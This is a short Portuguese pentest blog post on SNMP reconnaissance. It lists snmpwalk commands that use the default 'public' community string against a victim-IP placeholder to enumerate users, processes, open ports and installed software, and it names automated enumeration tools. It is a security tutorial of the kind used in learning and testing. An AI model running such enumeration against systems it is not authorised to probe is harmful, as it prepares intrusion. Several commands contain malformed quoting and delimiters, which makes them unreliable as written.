– root@injetionsec:~#

snmp reconnaissance

31.03.2015 (2:46 pm) – Filed under: Pentest ::

Simple Network Management Protocol (SNMP), é um “protocolo usado para gerenciar dispositivos em redes IP”,esses dispositivos podem ser roteadores, comutadores, servidores, estações de trabalho, impressoras, racks modernos e etc. Ele consiste de um conjunto de padrões de gerenciamento de rede, incluindo um protocolo da camada de aplicação, um esquema de banco de dados, e um conjunto de objetos de dados by wikipedia

snmp  reconnaissance , é baseado em  UDP, suscetivel a ataque IP spoofing , tem sistema fraco para autenticação, podemos usar um simples sniffer para caputrar um pedido SNMP é assim comprometer á rede.

– examinar informações de um servidor rodando windows :

snmpwalk -c public -v1 [ip_vítima] 1

– buscando informações sensíveis

snmpwalk -c public -v1 [ip_vítima] | grep -i SNMPv2-MIB :: sysdescr.0

– listadando usuários

snmpwalk -c public -v1 [ip_vítima] |  cut -d “” -f4

– enumerando serviços que estão executando “run name”

snmpwalk -c public -v1 [ip_vítima] 1 | grep -i hrswrunname | cut -d “” -f4

–  enumerar portas TCP abertas “tcp connstate”

snmpwalk -c public -v1 [ip_vítima]  1 | grep -i tcpconnstate | cut -d”.” -f6 | sort -nu

– enumerando software instalados “installed name”

snmpwalk -c public -v1 [ip_vítima] 1 | grep -i hrswinstalledname

Podemos usar algumas ferramentas automatizadas como : snmpenum.pl, snmpcheck.pl e onesixtyone para agilizar na enumeração.

=)